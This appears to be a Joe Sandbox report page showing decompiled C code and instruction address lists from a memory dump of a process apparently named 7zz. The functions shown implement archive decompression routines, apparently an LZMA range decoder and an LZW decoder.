								if(_t291 >= 0x1000000) {
									goto L31;
								}
								_t279 =  *(_t351 + 0x28);
								if(_t279 >=  *(_t351 + 0x10)) {
									goto L2;
								} else {
									_t291 = _t291 << 8;
									_t321 = _t321 << 0x00000008 |  *_t279 & 0x000000ff;
									 *(_t351 + 0x28) =  &(_t279[1]);
									goto L31;
								}
								goto L113;
								L31:
								_t278 = (_t291 >> 0xb) *  *(_t351 + 0x18);
								if(_t321 >= _t278) {
									_t290 = _t291 - _t278;
									_t321 = _t321 - _t278;
									_t319 = _t319 + _t319 + 1;
								} else {
									_t290 = _t278;
									_t319 = _t319 + _t319;
									_t192 =  !_t192;
								}
								_t216 = _t216 & _t192;
								if(_t319 >= 0x100) {
									goto L19;
								} else {
									_t271 =  *(_t351 + 0x20);
									continue;
								}
								goto L113;
							}
						} else {
							_t281 = 1;
							do {
								_t320 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t281 * 2) & 0x0000ffff;
								if(_t291 >= 0x1000000) {
									goto L15;
								} else {
									_t197 =  *(_t351 + 0x28);
									if(_t197 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t291 = _t291 << 8;
										_t321 = _t321 << 0x00000008 |  *_t197 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t197[1]);
										goto L15;
									}
								}
								goto L113;
								L15:
								_t196 = (_t291 >> 0xb) * _t320;
								if(_t321 >= _t196) {
									_t291 = _t291 - _t196;
									_t321 = _t321 - _t196;
									_t281 = _t281 + _t281 + 1;
								} else {
									_t291 = _t196;
									_t281 = _t281 + _t281;
								}
							} while (_t281 < 0x100);
							L19:
							 *(_t351 + 0x1c) = 1;
							L20:
							_t344 =  *(_t351 + 0x28);
							L21:
							if(_t290 >= 0x1000000 || _t344 <  *(_t351 + 0x10)) {
								return  *(_t351 + 0x1c);
							} else {
								goto L2;
							}
						}
					}
				} else {
					_t199 =  *(_t351 + 0x28);
					if(_t199 <  *(_t351 + 0x10)) {
						_t283 = _t283 << 8;
						_t321 = _t321 << 0x00000008 |  *_t199 & 0x000000ff;
						 *(_t351 + 0x28) =  &(_t199[1]);
						goto L4;
					} else {
						L2:
						return 0;
					}
				}
				L113:
			}

0x0045e0c7
0x0045e0cd
0x0045e0d0
0x0045e0d3
0x0045e0d8
0x0045e0db
0x0045e0ee
0x0045e0f3
0x0045e0fc
0x0045e106
0x0045e12e
0x0045e133
0x0045e13a
0x0045e2c6
0x0045e2ca
0x0045e2ce
0x0045e2d0
0x0045e2da
0x0045e2e4
0x0045e300
0x0045e305
0x0045e30c
0x0045e32b
0x0045e32d
0x0045e32f
0x0045e337
0x0045e345
0x0045e361
0x0045e366
0x0045e369
0x0045e36f
0x0045e3d8
0x0045e3dc
0x0045e3de
0x0045e3e8
0x0045e3f2
0x0045e40e
0x0045e413
0x0045e41a
0x0045e420
0x0045e428
0x0045e42a
0x0045e432
0x0045e44e
0x0045e453
0x0045e458
0x00000000
0x0045e45a
0x0045e45a
0x0045e45a
0x00000000
0x0045e434
0x0045e438
0x00000000
0x0045e43e
0x0045e444
0x0045e447
0x0045e44a
0x00000000
0x0045e44a
0x0045e438
0x0045e41c
0x0045e41c
0x00000000
0x0045e41c
0x0045e3f4
0x0045e3f8
0x00000000
0x0045e3fe
0x0045e404
0x0045e407
0x0045e409
0x0045e40a
0x00000000
0x0045e40a
0x0045e3f8
0x0045e371
0x0045e379
0x0045e37d
0x0045e381
0x0045e389
0x0045e3a7
0x0045e3ac
0x0045e3b1
0x0045e45e
0x0045e45e
0x0045e460
0x0045e462
0x0045e466
0x0045e46a
0x0045e472
0x00000000
0x0045e3b7
0x0045e3bd
0x0045e3d5
0x00000000
0x00000000
0x00000000
0x0045e3bd
0x0045e38b
0x0045e38f
0x00000000
0x0045e395
0x0045e398
0x0045e3a0
0x0045e3a2
0x0045e3a3
0x00000000
0x0045e3a3
0x0045e38f
0x0045e389
0x0045e347
0x0045e34b
0x00000000
0x0045e351
0x0045e357
0x0045e35a
0x0045e35d
0x00000000
0x0045e35d
0x0045e34b
0x0045e30e
0x0045e30e
0x0045e310
0x0045e318
0x0045e31e
0x0045e478
0x0045e478
0x0045e481
0x0045e49d
0x0045e4a2
0x0045e4a5
0x0045e4ab
0x0045e4c1
0x0045e4c5
0x0045e4c7
0x0045e4cf
0x0045e4eb
0x0045e4f0
0x0045e4f5
0x0045e50d
0x0045e50f
0x0045e511
0x0045e517
0x0045e51c
0x0045e4f7
0x0045e4f9
0x0045e4fe
0x0045e500
0x0045e507
0x0045e507
0x00000000
0x0045e4d1
0x0045e4d5
0x00000000
0x0045e4db
0x0045e4e1
0x0045e4e4
0x0045e4e6
0x0045e4e7
0x00000000
0x0045e4e7
0x0045e4d5
0x0045e4ad
0x0045e4af
0x0045e4b1
0x0045e4b5
0x0045e4b7
0x0045e524
0x0045e524
0x00000000
0x0045e530
0x0045e536
0x0045e552
0x0045e55b
0x0045e560
0x0045e568
0x0045e56a
0x0045e56c
0x0045e562
0x0045e562
0x0045e564
0x0045e564
0x0045e570
0x0045e576
0x0045e580
0x0045e587
0x00000000
0x0045e58d
0x0045e590
0x0045e592
0x0045e592
0x0045e597
0x0045e59b
0x0045e5a2
0x0045e5a2
0x0045e5a9
0x0045e5b0
0x0045e5b0
0x0045e5ba
0x00000000
0x0045e5bc
0x0045e5c0
0x00000000
0x0045e5c6
0x0045e5cd
0x0045e5d0
0x0045e5d2
0x00000000
0x0045e5d2
0x0045e5c0
0x00000000
0x0045e5d3
0x0045e5d8
0x0045e5dd
0x0045e5e5
0x0045e5e7
0x0045e5e9
0x0045e5df
0x0045e5df
0x0045e5e1
0x0045e5e1
0x0045e5ed
0x0045e5f2
0x0045e5f8
0x00000000
0x0045e5fe
0x0045e602
0x0045e606
0x0045e625
0x0045e629
0x0045e630
0x0045e636
0x00000000
0x0045e638
0x0045e63a
0x00000000
0x0045e640
0x0045e647
0x0045e64a
0x0045e64c
0x00000000
0x0045e64c
0x0045e63a
0x00000000
0x0045e64d
0x0045e64d
0x0045e659
0x0045e65b
0x0045e65b
0x0045e668
0x0045e66c
0x00000000
0x0045e608
0x0045e61f
0x0045e671
0x0045e671
0x0045e680
0x0045e684
0x0045e68e
0x00000000
0x0045e690
0x0045e694
0x00000000
0x0045e69a
0x0045e6a1
0x0045e6a4
0x0045e6a6
0x00000000
0x0045e6a6
0x0045e694
0x00000000
0x0045e6a7
0x0045e6ac
0x0045e6b1
0x0045e6b9
0x0045e6bb
0x0045e6bd
0x0045e6b3
0x0045e6b3
0x0045e6b5
0x0045e6b5
0x0045e6c1
0x0045e6c1
0x00000000
0x0045e6c4
0x0045e606
0x0045e5f8
0x0045e578
0x0045e578
0x00000000
0x0045e578
0x0045e538
0x0045e53c
0x00000000
0x0045e542
0x0045e548
0x0045e54b
0x0045e54e
0x00000000
0x0045e54e
0x0045e53c
0x00000000
0x0045e536
0x0045e530
0x0045e483
0x0045e487
0x00000000
0x0045e48d
0x0045e493
0x0045e496
0x0045e499
0x00000000
0x0045e499
0x0045e487
0x0045e481
0x0045e2e6
0x0045e2ea
0x00000000
0x0045e2f0
0x0045e2f6
0x0045e2f9
0x0045e2fb
0x0045e2fc
0x00000000
0x0045e2fc
0x0045e2ea
0x0045e140
0x0045e140
0x0045e14f
0x0045e153
0x0045e15b
0x0045e160
0x0045e162
0x0045e162
0x0045e192
0x0045e192
0x0045e199
0x0045e22c
0x0045e22f
0x0045e234
0x0045e23b
0x0045e236
0x0045e236
0x0045e236
0x0045e244
0x0045e248
0x0045e24d
0x0045e252
0x0045e256
0x0045e25a
0x0045e25c
0x0045e26a
0x0045e274
0x00000000
0x00000000
0x0045e276
0x0045e27e
0x00000000
0x0045e284
0x0045e28a
0x0045e28d
0x0045e290
0x00000000
0x0045e290
0x00000000
0x0045e294
0x0045e299
0x0045e2a0
0x0045e2aa
0x0045e2ac
0x0045e2ae
0x0045e2a2
0x0045e2a2
0x0045e2a4
0x0045e2a6
0x0045e2a6
0x0045e2b2
0x0045e2ba
0x00000000
0x0045e2c0
0x0045e2c0
0x00000000
0x0045e2c0
0x00000000
0x0045e2ba
0x0045e19f
0x0045e19f
0x0045e1b0
0x0045e1b4
0x0045e1be
0x00000000
0x0045e1c0
0x0045e1c0
0x0045e1c8
0x00000000
0x0045e1ce
0x0045e1d4
0x0045e1d7
0x0045e1da
0x00000000
0x0045e1da
0x0045e1c8
0x00000000
0x0045e1de
0x0045e1e3
0x0045e1e8
0x0045e1f0
0x0045e1f2
0x0045e1f4
0x0045e1ea
0x0045e1ea
0x0045e1ec
0x0045e1ec
0x0045e1f8
0x0045e200
0x0045e200
0x0045e208
0x0045e208
0x0045e20c
0x0045e212
0x0045e229
0x00000000
0x00000000
0x00000000
0x0045e212
0x0045e199
0x0045e108
0x0045e108
0x0045e110
0x0045e124
0x0045e127
0x0045e12a
0x00000000
0x0045e115
0x0045e115
0x0045e11b
0x0045e11b
0x0045e110
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
Instruction ID: e022bf08bd3fa299583df900fa6ce6294aaf835f4f5ad4fca60e15bd747eae71
Opcode Fuzzy Hash: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
Instruction Fuzzy Hash: 39022972A042118BD71CCE19C580279BBE3FBC5346F110A3FEC9697686D6389A4DCB99

Uniqueness

Uniqueness Score: -1.00%

Function 00454B10 Relevance: .5, Instructions: 475
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00454B10(void* __ecx, void* __eflags) {
				void* __edi;
				int _t219;
				unsigned char _t223;
				int _t225;
				int _t227;
				int _t228;
				intOrPtr _t234;
				intOrPtr _t235;
				signed int* _t236;
				signed int _t242;
				int _t245;
				int _t247;
				int _t251;
				signed int _t254;
				intOrPtr _t257;
				signed int _t258;
				void* _t259;
				signed int _t260;
				int _t264;
				int _t267;
				int _t269;
				signed int _t272;
				int _t275;
				int _t277;
				int _t281;
				int _t283;
				int _t287;
				int _t289;
				int _t293;
				int _t295;
				int _t299;
				int _t301;
				signed char _t305;
				signed int _t307;
				signed char _t317;
				signed char _t332;
				int _t349;
				char _t355;
				signed int _t357;
				signed int _t358;
				int _t361;
				signed int _t366;
				int _t391;
				signed int _t406;
				signed int _t421;
				signed int _t431;
				int _t432;
				void* _t433;
				int _t434;
				signed int _t435;
				void* _t436;
				void* _t441;
				intOrPtr _t443;
				void* _t444;

				_push(0xffffffff);
				_push(E00479B9E);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t443;
				_t444 = _t443 - 0x94;
				_t441 = __ecx;
				E0040DF82(_t444 + 0x1c);
				_t421 = 0;
				 *(_t444 + 0xac) = 0;
				 *((intOrPtr*)(_t444 + 0x40)) = 0;
				 *((intOrPtr*)(_t444 + 0x44)) = 0;
				 *(_t444 + 0x54) = 0;
				 *((intOrPtr*)(_t444 + 0x60)) = 0;
				 *((char*)(_t444 + 0xb0)) = 1;
				if(E0040DF95(_t444 + 0x20, 0x100000) != 0) {
					E0040DFE4(_t444 + 0x1c,  *((intOrPtr*)(_t444 + 0xb4)));
					E0040DFF3(_t444 + 0x1c);
					_t219 = E0040EE76(_t444 + 0x44, 0x100000);
					__eflags = _t219;
					if(_t219 != 0) {
						E0040EEC1(_t444 + 0x40,  *((intOrPtr*)(_t444 + 0xb8)));
						E0040EED0(_t444 + 0x40);
						_t223 =  *((intOrPtr*)(__ecx + 0x18));
						_t317 = _t223 & 0x0000001f;
						_t305 = _t317;
						__eflags = _t305 - 9;
						 *(_t444 + 0x74) = _t305;
						if(_t305 < 9) {
							L81:
							 *(_t444 + 0xac) = 6;
							E0040EEB2(_t444 + 0x40);
							_t225 =  *(_t444 + 0x54);
							 *(_t444 + 0xac) = 0;
							__eflags = _t225 - _t421;
							if(_t225 != _t421) {
								 *((intOrPtr*)( *_t225 + 8))(_t225);
							}
							 *(_t444 + 0xac) = 7;
							E0040DFD3(_t444 + 0x1c);
							_t227 =  *(_t444 + 0x28);
							 *(_t444 + 0xac) = 0xffffffff;
							__eflags = _t227 - _t421;
							if(_t227 == _t421) {
								L85:
								_t228 = 1;
								goto L86;
							} else {
								L84:
								 *((intOrPtr*)( *_t227 + 8))(_t227);
								goto L85;
							}
						}
						__eflags = _t305 - 0x10;
						if(_t305 > 0x10) {
							goto L81;
						}
						_t431 = 1 << _t317;
						 *(_t444 + 0x13) = _t223 >> 7;
						__eflags = _t305 -  *((intOrPtr*)(__ecx + 0x1c));
						 *(_t444 + 0x70) = 1;
						if(_t305 !=  *((intOrPtr*)(__ecx + 0x1c))) {
							L17:
							E00454AB0(_t441);
							_t234 = E00458590(_t431 + _t431);
							__eflags = _t234 - _t421;
							 *((intOrPtr*)(_t441 + 0xc)) = _t234;
							if(_t234 != _t421) {
								_t235 = E00458590(_t431);
								__eflags = _t235 - _t421;
								 *((intOrPtr*)(_t441 + 0x10)) = _t235;
								if(_t235 != _t421) {
									_t236 = E00458590(_t431);
									__eflags = _t236 - _t421;
									 *(_t441 + 0x14) = _t236;
									if(_t236 != _t421) {
										 *(_t441 + 0x1c) = _t305;
										L34:
										 *(_t444 + 0x68) = _t421;
										__eflags =  *(_t444 + 0x13);
										 *( *((intOrPtr*)(_t441 + 0xc)) + 0x200) = _t421;
										_t391 = (0 |  *(_t444 + 0x13) != 0x00000000) + 0x100;
										__eflags = _t391;
										 *(_t444 + 0x6c) = _t421;
										_t307 = 9;
										 *(_t444 + 0x18) = _t391;
										 *(_t444 + 0x12) = 0;
										 *(_t444 + 0x14) = _t421;
										 *((char*)( *((intOrPtr*)(_t441 + 0x10)) + 0x100)) = 0;
										while(1) {
											__eflags =  *(_t444 + 0x14) - _t421;
											if( *(_t444 + 0x14) != _t421) {
												goto L50;
											}
											L36:
											_t259 =  *(_t444 + 0x1c);
											__eflags =  *((intOrPtr*)(_t444 + 0x20)) - _t259 - _t307;
											if( *((intOrPtr*)(_t444 + 0x20)) - _t259 < _t307) {
												_t435 = 0;
												__eflags = _t307;
												if(_t307 <= 0) {
													L45:
													_t435 = _t307;
													L46:
													_t406 = _t435 * 8;
													 *(_t444 + 0x14) = _t406;
													_t421 = 0;
													_t260 = E0040EEE8(_t444 + 0x40);
													 *(_t444 + 0x88) = _t260;
													__eflags =  *(_t444 + 0xc4);
													 *(_t444 + 0x8c) = _t406;
													if( *(_t444 + 0xc4) == 0) {
														goto L50;
													}
													_t349 = _t260 -  *(_t444 + 0x68);
													__eflags = _t349;
													asm("sbb esi, [esp+0x6c]");
													 *(_t444 + 0x7c) = _t406;
													if(_t349 != 0) {
														L49:
														 *(_t444 + 0x68) = _t260;
														 *(_t444 + 0x6c) = _t406;
														asm("cdq");
														asm("adc edx, ecx");
														 *((intOrPtr*)(_t444 + 0x80)) =  *(_t444 + 0x1c) -  *((intOrPtr*)(_t444 + 0x24)) +  *((intOrPtr*)(_t444 + 0x2c));
														_t264 =  *(_t444 + 0xc4);
														 *(_t444 + 0x84) = _t406;
														_t432 =  *((intOrPtr*)( *_t264 + 0xc))(_t264, _t444 + 0x84, _t444 + 0x88);
														__eflags = _t432;
														if(_t432 != 0) {
															 *(_t444 + 0xac) = 0xe;
															E0040EEB2(_t444 + 0x40);
															_t267 =  *(_t444 + 0x54);
															 *(_t444 + 0xac) = 0;
															__eflags = _t267;
															if(_t267 != 0) {
																 *((intOrPtr*)( *_t267 + 8))(_t267);
															}
															 *(_t444 + 0xac) = 0xf;
															L74:
															E0040DFD3(_t444 + 0x1c);
															_t247 =  *(_t444 + 0x28);
															 *(_t444 + 0xac) = 0xffffffff;
															__eflags = _t247;
															if(_t247 != 0) {
																 *((intOrPtr*)( *_t247 + 8))(_t247);
															}
															_t228 = _t432;
															goto L86;
														}
														goto L50;
													}
													__eflags = _t349 - 0x40000;
													if(_t349 < 0x40000) {
														goto L50;
													}
													goto L49;
												} else {
													goto L41;
												}
												do {
													L41:
													__eflags = _t259 -  *((intOrPtr*)(_t444 + 0x20));
													if(_t259 <  *((intOrPtr*)(_t444 + 0x20))) {
														goto L44;
													}
													_t269 = E0040E007(_t444 + 0x1c, _t421);
													__eflags = _t269;
													if(_t269 == 0) {
														goto L46;
													}
													_t259 =  *(_t444 + 0x1c);
													L44:
													_t355 =  *_t259;
													_t259 = _t259 + 1;
													 *((char*)(_t444 + _t435 + 0x90)) = _t355;
													_t435 = _t435 + 1;
													__eflags = _t435 - _t307;
													 *(_t444 + 0x1c) = _t259;
												} while (_t435 < _t307);
												goto L45;
											}
											__eflags = _t307;
											if(_t307 > 0) {
												_t357 = _t307;
												_t436 = _t259;
												_t358 = _t357 >> 2;
												memcpy(_t444 + 0x90, _t436, _t358 << 2);
												_t361 = _t357 & 0x00000003;
												__eflags = _t361;
												_t259 = memcpy(_t436 + _t358 + _t358, _t436, _t361);
												_t444 = _t444 + 0x18;
											}
											 *(_t444 + 0x1c) = _t259 + _t307;
											goto L45;
											L50:
											 *(_t444 + 0x78) = 1 << _t307;
											_t332 = _t421 & 0x00000007;
											_t421 = _t421 + _t307;
											_t242 =  *(_t444 + 0x78) - 0x00000001 & 0 << 0x00000008 >> _t332;
											__eflags = _t421 -  *(_t444 + 0x14);
											 *(_t444 + 0x3c) = _t242;
											if(_t421 >  *(_t444 + 0x14)) {
												_t432 = E0040EFA1(_t444 + 0x40);
												 *(_t444 + 0xac) = 0x12;
												E0040EEB2(_t444 + 0x40);
												_t245 =  *(_t444 + 0x54);
												 *(_t444 + 0xac) = 0;
												__eflags = _t245;
												if(_t245 != 0) {
													 *((intOrPtr*)( *_t245 + 8))(_t245);
												}
												 *(_t444 + 0xac) = 0x13;
												goto L74;
											}
											__eflags = _t242 -  *(_t444 + 0x18);
											if(_t242 >=  *(_t444 + 0x18)) {
												 *(_t444 + 0xac) = 0x10;
												E0040EEB2(_t444 + 0x40);
												_t251 =  *(_t444 + 0x54);
												 *(_t444 + 0xac) = 0;
												__eflags = _t251;
												if(_t251 != 0) {
													 *((intOrPtr*)( *_t251 + 8))(_t251);
												}
												 *(_t444 + 0xac) = 0x11;
												E0040DFD3(_t444 + 0x1c);
												_t227 =  *(_t444 + 0x28);
												 *(_t444 + 0xac) = 0xffffffff;
												__eflags = _t227;
												if(_t227 == 0) {
													goto L85;
												} else {
													goto L84;
												}
											}
											__eflags =  *(_t444 + 0x13);
											if( *(_t444 + 0x13) == 0) {
												L56:
												_t254 =  *(_t444 + 0x3c);
												_t433 = 0;
												__eflags = _t254 - 0x100;
												if(_t254 < 0x100) {
													L58:
													 *(_t433 +  *(_t441 + 0x14)) = _t254;
													_t434 = _t433 + 1;
													__eflags =  *(_t444 + 0x12);
													if( *(_t444 + 0x12) != 0) {
														_t366 =  *(_t444 + 0x18);
														 *(_t366 +  *((intOrPtr*)(_t441 + 0x10)) - 1) = _t254;
														__eflags =  *(_t444 + 0x3c) - _t366 - 1;
														if( *(_t444 + 0x3c) == _t366 - 1) {
															 *( *(_t441 + 0x14)) = _t254;
														}
													}
													do {
														_t434 = _t434 - 1;
														 *((char*)( *((intOrPtr*)(_t444 + 0x44)) +  *((intOrPtr*)(_t444 + 0x40)))) =  *((intOrPtr*)( *(_t441 + 0x14) + _t434));
														_t257 =  *((intOrPtr*)(_t444 + 0x44)) + 1;
														__eflags = _t257 -  *((intOrPtr*)(_t444 + 0x48));
														 *((intOrPtr*)(_t444 + 0x44)) = _t257;
														if(__eflags == 0) {
															E0040EFBD(_t444 + 0x40, __eflags);
														}
														__eflags = _t434;
													} while (_t434 > 0);
													_t258 =  *(_t444 + 0x18);
													__eflags = _t258 -  *(_t444 + 0x70);
													if(_t258 >=  *(_t444 + 0x70)) {
														L55:
														 *(_t444 + 0x12) = 0;
														while(1) {
															__eflags =  *(_t444 + 0x14) - _t421;
															if( *(_t444 + 0x14) != _t421) {
																goto L50;
															}
															goto L36;
														}
													}
													 *(_t444 + 0x12) = 1;
													 *((short*)( *((intOrPtr*)(_t441 + 0xc)) + _t258 * 2)) =  *(_t444 + 0x3c);
													_t272 = _t258 + 1;
													__eflags = _t272 -  *(_t444 + 0x78);
													 *(_t444 + 0x18) = _t272;
													if(_t272 >  *(_t444 + 0x78)) {
														__eflags = _t307 -  *(_t444 + 0x74);
														if(_t307 <  *(_t444 + 0x74)) {
															_t421 = 0;
															_t307 = _t307 + 1;
															 *(_t444 + 0x14) = 0;
														}
													}
													continue;
												} else {
													goto L57;
												}
												do {
													L57:
													_t433 = _t433 + 1;
													 *((char*)(_t433 +  *(_t441 + 0x14) - 1)) =  *((intOrPtr*)(_t254 +  *((intOrPtr*)(_t441 + 0x10))));
													_t254 = 0;
													__eflags = 0 - 0x100;
												} while (0 >= 0x100);
												goto L58;
											}
											__eflags = _t242 - 0x100;
											if(_t242 != 0x100) {
												goto L56;
											}
											_t421 = 0;
											__eflags = 0;
											_t307 = 9;
											 *(_t444 + 0x14) = 0;
											 *(_t444 + 0x18) = 0x101;
											goto L55;
										}
									}
									 *(_t444 + 0xac) = 0xc;
									E0040EEB2(_t444 + 0x40);
									_t275 =  *(_t444 + 0x54);
									 *(_t444 + 0xac) = 0;
									__eflags = _t275 - _t421;
									if(_t275 != _t421) {
										 *((intOrPtr*)( *_t275 + 8))(_t275);
									}
									 *(_t444 + 0xac) = 0xd;
									E0040DFD3(_t444 + 0x1c);
									_t277 =  *(_t444 + 0x28);
									 *(_t444 + 0xac) = 0xffffffff;
									__eflags = _t277 - _t421;
									if(_t277 != _t421) {
										 *((intOrPtr*)( *_t277 + 8))(_t277);
									}
									L32:
									_t228 = 0x8007000e;
									goto L86;
								}
								 *(_t444 + 0xac) = 0xa;
								E0040EEB2(_t444 + 0x40);
								_t281 =  *(_t444 + 0x54);
								 *(_t444 + 0xac) = 0;
								__eflags = _t281 - _t421;
								if(_t281 != _t421) {
									 *((intOrPtr*)( *_t281 + 8))(_t281);
								}
								 *(_t444 + 0xac) = 0xb;
								E0040DFD3(_t444 + 0x1c);
								_t283 =  *(_t444 + 0x28);
								 *(_t444 + 0xac) = 0xffffffff;
								__eflags = _t283 - _t421;
								if(_t283 == _t421) {
									goto L32;
								} else {
									 *((intOrPtr*)( *_t283 + 8))(_t283);
									_t228 = 0x8007000e;
									goto L86;
								}
							}
							 *(_t444 + 0xac) = 8;
							E0040EEB2(_t444 + 0x40);
							_t287 =  *(_t444 + 0x54);
							 *(_t444 + 0xac) = 0;
							__eflags = _t287 - _t421;
							if(_t287 != _t421) {
								 *((intOrPtr*)( *_t287 + 8))(_t287);
							}
							 *(_t444 + 0xac) = 9;
							E0040DFD3(_t444 + 0x1c);
							_t289 =  *(_t444 + 0x28);
							 *(_t444 + 0xac) = 0xffffffff;
							__eflags = _t289 - _t421;
							if(_t289 == _t421) {
								goto L32;
							} else {
								 *((intOrPtr*)( *_t289 + 8))(_t289);
								_t228 = 0x8007000e;
								goto L86;
							}
						}
						__eflags =  *(__ecx + 0xc);
						if( *(__ecx + 0xc) == 0) {
							goto L17;
						}
						__eflags =  *(__ecx + 0x10);
						if( *(__ecx + 0x10) == 0) {
							goto L17;
						}
						__eflags =  *(__ecx + 0x14);
						if( *(__ecx + 0x14) != 0) {
							goto L34;
						}
						goto L17;
					} else {
						 *(_t444 + 0xac) = 4;
						E0040EEB2(_t444 + 0x40);
						_t293 =  *(_t444 + 0x54);
						 *(_t444 + 0xac) = 0;
						__eflags = _t293;
						if(_t293 != 0) {
							 *((intOrPtr*)( *_t293 + 8))(_t293);
						}
						 *(_t444 + 0xac) = 5;
						E0040DFD3(_t444 + 0x1c);
						_t295 =  *(_t444 + 0x28);
						 *(_t444 + 0xac) = 0xffffffff;
						__eflags = _t295 - _t421;
						if(_t295 != _t421) {
							 *((intOrPtr*)( *_t295 + 8))(_t295);
						}
						goto L10;
					}
				} else {
					 *(_t444 + 0xac) = 2;
					E0040EEB2(_t444 + 0x40);
					_t299 =  *(_t444 + 0x54);
					 *(_t444 + 0xac) = 0;
					if(_t299 != 0) {
						 *((intOrPtr*)( *_t299 + 8))(_t299);
					}
					 *(_t444 + 0xac) = 3;
					E0040DFD3(_t444 + 0x1c);
					_t301 =  *(_t444 + 0x28);
					 *(_t444 + 0xac) = 0xffffffff;
					if(_t301 == _t421) {
						L10:
						_t228 = 0x8007000e;
						goto L86;
					} else {
						 *((intOrPtr*)( *_t301 + 8))(_t301);
						_t228 = 0x8007000e;
						L86:
						 *[fs:0x0] =  *((intOrPtr*)(_t444 + 0xa4));
						return _t228;
					}
				}
			}

0x00454b10
0x00454b12
0x00454b1d
0x00454b1e
0x00454b25
0x00454b2d
0x00454b35
0x00454b3a
0x00454b3c
0x00454b43
0x00454b47
0x00454b4b
0x00454b4f
0x00454b5c
0x00454b6b
0x00454bdb
0x00454be4
0x00454bf2
0x00454bf7
0x00454bf9
0x00454c65
0x00454c6e
0x00454c73
0x00454c78
0x00454c7b
0x00454c7d
0x00454c80
0x00454c84
0x0045519c
0x004551a0
0x004551a8
0x004551ad
0x004551b1
0x004551b9
0x004551bb
0x004551c0
0x004551c0
0x004551c7
0x004551d2
0x004551d7
0x004551db
0x004551e6
0x004551e8
0x004551f0
0x004551f0
0x00000000
0x004551ea
0x004551ea
0x004551ed
0x00000000
0x004551ed
0x004551e8
0x00454c8a
0x00454c8d
0x00000000
0x00000000
0x00454c9b
0x00454c9d
0x00454ca4
0x00454ca6
0x00454caa
0x00454cbf
0x00454cc1
0x00454cc9
0x00454cce
0x00454cd0
0x00454cd3
0x00454d39
0x00454d3e
0x00454d40
0x00454d43
0x00454da5
0x00454daa
0x00454dac
0x00454daf
0x00454e0f
0x00454e12
0x00454e1b
0x00454e1f
0x00454e24
0x00454e2e
0x00454e2e
0x00454e34
0x00454e38
0x00454e3d
0x00454e41
0x00454e46
0x00454e4a
0x00454e51
0x00454e51
0x00454e55
0x00000000
0x00000000
0x00454e5b
0x00454e5f
0x00454e65
0x00454e67
0x00454e8e
0x00454e90
0x00454e92
0x00454ebe
0x00454ebe
0x00454ec0
0x00454ec0
0x00454ecb
0x00454ecf
0x00454ed1
0x00454edd
0x00454ee4
0x00454ee6
0x00454eed
0x00000000
0x00000000
0x00454ef5
0x00454ef5
0x00454ef9
0x00454efd
0x00454f01
0x00454f0b
0x00454f13
0x00454f21
0x00454f25
0x00454f28
0x00454f2a
0x00454f31
0x00454f38
0x00454f55
0x00454f57
0x00454f59
0x004550b6
0x004550be
0x004550c3
0x004550c7
0x004550cf
0x004550d1
0x004550d6
0x004550d6
0x004550d9
0x00455123
0x00455127
0x0045512c
0x00455130
0x0045513b
0x0045513d
0x00455142
0x00455142
0x00455145
0x00000000
0x00455145
0x00000000
0x00454f59
0x00454f03
0x00454f09
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00454e94
0x00454e94
0x00454e94
0x00454e98
0x00000000
0x00000000
0x00454e9e
0x00454ea3
0x00454ea5
0x00000000
0x00000000
0x00454ea7
0x00454eab
0x00454eab
0x00454ead
0x00454eae
0x00454eb5
0x00454eb6
0x00454eb8
0x00454eb8
0x00000000
0x00454e94
0x00454e69
0x00454e6b
0x00454e6d
0x00454e6f
0x00454e7a
0x00454e7d
0x00454e81
0x00454e81
0x00454e84
0x00454e84
0x00454e84
0x00454e88
0x00000000
0x00454f5f
0x00454f76
0x00454f95
0x00454f98
0x00454fa1
0x00454fa3
0x00454fa5
0x00454fa9
0x004550ef
0x004550f5
0x004550fd
0x00455102
0x00455106
0x0045510e
0x00455110
0x00455115
0x00455115
0x00455118
0x00000000
0x00455118
0x00454faf
0x00454fb3
0x00455150
0x00455158
0x0045515d
0x00455161
0x00455169
0x0045516b
0x00455170
0x00455170
0x00455177
0x00455182
0x00455187
0x0045518b
0x00455196
0x00455198
0x00000000
0x0045519a
0x00000000
0x0045519a
0x00455198
0x00454fbd
0x00454fbf
0x00454fe5
0x00454fe5
0x00454fe9
0x00454feb
0x00454ff0
0x00455012
0x00455019
0x0045501c
0x0045501d
0x0045501f
0x00455024
0x00455028
0x00455031
0x00455033
0x00455038
0x00455038
0x00455033
0x0045503a
0x00455041
0x00455049
0x00455054
0x00455055
0x00455057
0x0045505b
0x00455061
0x00455061
0x00455066
0x00455066
0x0045506a
0x00455072
0x00455074
0x00454fdb
0x00454fdb
0x00454e51
0x00454e51
0x00454e55
0x00000000
0x00000000
0x00000000
0x00454e55
0x00454e51
0x00455082
0x00455087
0x0045508f
0x00455090
0x00455092
0x00455096
0x0045509c
0x004550a0
0x004550a6
0x004550a8
0x004550a9
0x004550a9
0x004550a0
0x00000000
0x00000000
0x00000000
0x00000000
0x00454ff2
0x00454ff2
0x00454ff8
0x00454ffc
0x00455009
0x0045500b
0x0045500b
